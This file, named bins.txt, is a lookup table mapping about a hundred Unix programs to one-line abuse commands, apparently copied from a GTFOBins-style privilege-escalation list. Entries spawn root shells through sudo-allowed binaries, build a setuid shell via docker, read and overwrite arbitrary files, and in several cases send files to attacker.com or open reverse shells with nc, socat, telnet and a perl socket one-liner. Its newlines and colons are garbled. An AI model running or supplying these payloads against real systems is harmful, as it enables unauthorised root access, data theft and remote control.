bins.txt

"apt"| "apt-get changelog aptn!/bin/shn", 
"apt-get"| "apt-get changelog aptn!/bin/shn", 
"aria2c"| "COMMAND='id'nTF=$(mktemp)necho "$COMMAND" > $TFnchmod +x $TFnaria2c --on-download-error=$TF http|//xn", 
"ash"| "ash", 
"awk"| "awk 'BEGIN {system("/bin/sh")}'", 
"base64"| "LFILE=file_to_readnbase64 "$LFILE" | base64 --decoden", 
"bash"| "bash", 
"busybox"| "busybox sh", 
"cat"| "LFILE=file_to_readncat "$LFILE"n", 
"chmod"| "LFILE=file_to_changensudo chmod 0777 $LFILEn", 
"chown"| "LFILE=file_to_changensudo chown $(id -un)|$(id -gn) $LFILEn", 
"cp"| "LFILE=file_to_writenTF=$(mktemp)necho "DATA" > $TFnsudo cp $TF $LFILEn", 
"cpulimit"| "cpulimit -l 100 -f /bin/sh", 
"crontab"| "crontab -e", 
"csh"| "csh", 
"curl"| "LFILE=/tmp/file_to_readncurl file|//$LFILEn", 
"cut"| "LFILE=file_to_readncut -d "" -f1 "$LFILE"n", 
"dash"| "dash", 
"date"| "LFILE=file_to_readndate -f $LFILEn", 
"dd"| "LFILE=file_to_writenecho "DATA" | dd of=$LFILEn", 
"diff"| "LFILE=file_to_readndiff --line-format=%L /dev/null $LFILEn", 
"docker"| "sudo docker run --rm -v /home/$USER|/h_docs ubuntu n    sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -pn", 
"ed"| "edn!/bin/shn", 
"emacs"| "emacs -Q -nw --eval '(term "/bin/sh")'", 
"env"| "env /bin/sh", 
"expand"| "LFILE=file_to_readnexpand "$LFILE"n", 
"expect"| "expect -c 'spawn /bin/sh;interact'", 
"facter"| "TF=$(mktemp -d)necho 'exec("/bin/sh")' > $TF/x.rbnFACTERLIB=$TF factern", 
"find"| "find . -exec /bin/sh ; -quit", 
"finger"| "RHOST=attacker.comnLFILE=file_to_sendnfinger "$(base64 $LFILE)@$RHOST"n", 
"flock"| "flock -u / /bin/sh", 
"fmt"| "LFILE=file_to_readnfmt -pNON_EXISTING_PREFIX "$LFILE"n", 
"fold"| "LFILE=file_to_readnfold -w99999999 "$LFILE"n", 
"ftp"| "ftpn!/bin/shn", 
"gdb"| "gdb -nx -ex '!sh' -ex quit", 
"git"| "PAGER='sh -c "exec sh 0<&1"' git -p help", 
"head"| "LFILE=file_to_readnhead -c1G "$LFILE"n", 
"ionice"| "ionice /bin/sh", 
"jq"| "LFILE=file_to_readnjq -Rr . "$LFILE"n", 
"ksh"| "ksh", 
"ld.so"| "/lib/ld.so /bin/sh", 
"less"| "less /etc/profilen!/bin/shn", 
"ltrace"| "ltrace -b -L /bin/sh", 
"lua"| "lua -e 'os.execute("/bin/sh")'", 
"mail"| "TF=$(mktemp)necho "From nobody@localhost $(date)" > $TFnmail -f $TFn!/bin/shn", 
"make"| "COMMAND='/bin/sh'nmake -s --eval=$'x|nt-'"$COMMAND"n", 
"man"| "man mann!/bin/shn", 
"more"| "TERM= more /etc/profilen!/bin/shn", 
"mount"| "sudo mount -o bind /bin/sh /bin/mountnsudo mountn", 
"mv"| "LFILE=file_to_writenTF=$(mktemp)necho "DATA" > $TFnsudo mv $TF $LFILEn", 
"mysql"| "mysql -e '! /bin/sh'", 
"nano"| "TF=$(mktemp)necho 'exec sh' > $TFnchmod +x $TFnnano -s $TF /etc/hostsn^Tn", 
"nc"| "RHOST=attacker.comnRPORT=12345nsudo nc -e /bin/sh $RHOST $RPORTn", 
"nice"| "nice /bin/sh", 
"nl"| "LFILE=file_to_readnnl -bn -w1 -s '' $LFILEn", 
"nmap"| "TF=$(mktemp)necho 'os.execute("/bin/sh")' > $TFnnmap --script=$TFn", 
"node"| "node -e 'require("child_process").spawn("/bin/sh", {stdio| [0, 1, 2]});'n", 
"od"| "LFILE=file_to_readnod -An -c -w9999 "$LFILE"n", 
"perl"| "perl -e 'exec "/bin/sh";' " # "sudo /usr/bin/perl -e 'exec("/bin/bash")'" # "sudo /usr/perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">");open(STDOUT,">");open(STDERR,">");exec("/bin/sh -i");};'"
"pg"| "pg /etc/profilen!/bin/shn", 
"php"| "export CMD="/bin/sh"nphp -r 'system(getenv("CMD"));'n", 
"pico"| "TF=$(mktemp)necho 'exec sh' > $TFnchmod +x $TFnpico -s $TF /etc/hostsn^Tn", 
"pip"| "TF=$(mktemp -d)necho 'import os; os.dup2(0, 1); os.dup2(0, 2); os.execl("/bin/sh", "sh")' > $TF/setup.pynpip install $TFn", 
"puppet"| "puppet apply -e "exec { '/bin/sh -c "exec sh -i <$(tty) >$(tty) 2>$(tty)"'| }"n", 
"python2"| "python2 -c 'import os; os.system("/bin/sh")'", 
"python3"| "python3 -c 'import os; os.system("/bin/sh")'", 
"red"| "red file_to_writenanDATAn.nwnqn", 
"rlwrap"| "rlwrap /bin/sh", 
"rpm"| "rpm --eval '%{lua|posix.exec("/bin/sh")}'", 
"rpmquery"| "rpmquery --eval '%{lua|posix.exec("/bin/sh")}'", 
"rsync"| "rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1|/dev/null", 
"ruby"| "ruby -e 'exec "/bin/sh"'", 
"scp"| "TF=$(mktemp)necho 'sh 0<&2 1>&2' > $TFnchmod +x "$TF"nscp -S $TF x y|n", 
"sed"| "sed -n '1e exec sh 1>&0' /etc/hosts", 
"setarch"| "setarch $(arch) /bin/sh", 
"sftp"| "HOST=user@attacker.comnsftp $HOSTn!/bin/shn", 
"shuf"| "LFILE=file_to_writenshuf -e DATA -o "$LFILE"n", 
"smbclient"| "smbclient ipsharen!/bin/shn", 
"socat"| "RHOST=attacker.comnRPORT=12345nsudo -E socat tcp-connect|$RHOST|$RPORT exec|sh,pty,stderr,setsid,sigint,sanen", 
"sort"| "LFILE=file_to_readnsort -m "$LFILE"n", 
"sqlite3"| "sqlite3 /dev/null '.shell /bin/sh'", 
"ssh"| "ssh localhost $SHELL --noprofile --norc", 
"stdbuf"| "stdbuf -i0 /bin/sh", 
"strace"| "strace -o /dev/null /bin/sh", 
"tail"| "LFILE=file_to_readntail -c1G "$LFILE"n", 
"tar"| "tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh", 
"taskset"| "taskset 1 /bin/sh", 
"tclsh"| "tclshnexec /bin/sh <@stdin >@stdout 2>@stderrn", 
"tcpdump"| "COMMAND='id'nTF=$(mktemp)necho "$COMMAND" > $TFnchmod +x $TFntcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TFn", 
"tee"| "LFILE=file_to_writenecho DATA | ./tee -a "$LFILE"n", 
"telnet"| "RHOST=attacker.comnRPORT=12345ntelnet $RHOST $RPORTn^]n!/bin/shn", 
"tftp"| "RHOST=attacker.comnsudo -E tftp $RHOSTnput file_to_sendn", 
"time"| "/usr/bin/time /bin/sh", 
"timeout"| "timeout 7d /bin/sh", 
"ul"| "LFILE=file_to_readnul "$LFILE"n", 
"unexpand"| "LFILE=file_to_readnunexpand -t99999999 "$LFILE"n", 
"uniq"| "LFILE=file_to_readnuniq "$LFILE"n", 
"unshare"| "unshare /bin/sh", 
"vi"| "vi -c '|!/bin/sh'", 
"vim"| "vim -c '|!/bin/sh'", 
"watch"| "watch -x sh -c 'reset; exec sh 1>&0 2>&0'", 
"wget"| "export URL=http|//attacker.com/file_to_getnexport LFILE=file_to_savensudo -E wget $URL -O $LFILEn", 
"whois"| "RHOST=attacker.comnRPORT=12345nLFILE=file_to_savenwhois -h $RHOST -p $RPORT > "$LFILE"n", 
"wish"| "wishnexec /bin/sh <@stdin >@stdout 2>@stderrn", 
"xargs"| "xargs -a /dev/null sh", 
"xxd"| "LFILE=file_to_writenecho DATA | xxd | xxd -r - "$LFILE"n", 
"zip"| "TF=$(mktemp -u)nzip $TF /etc/hosts -T -TT 'sh #'nrm $TFn", 
"zsh"| "zsh"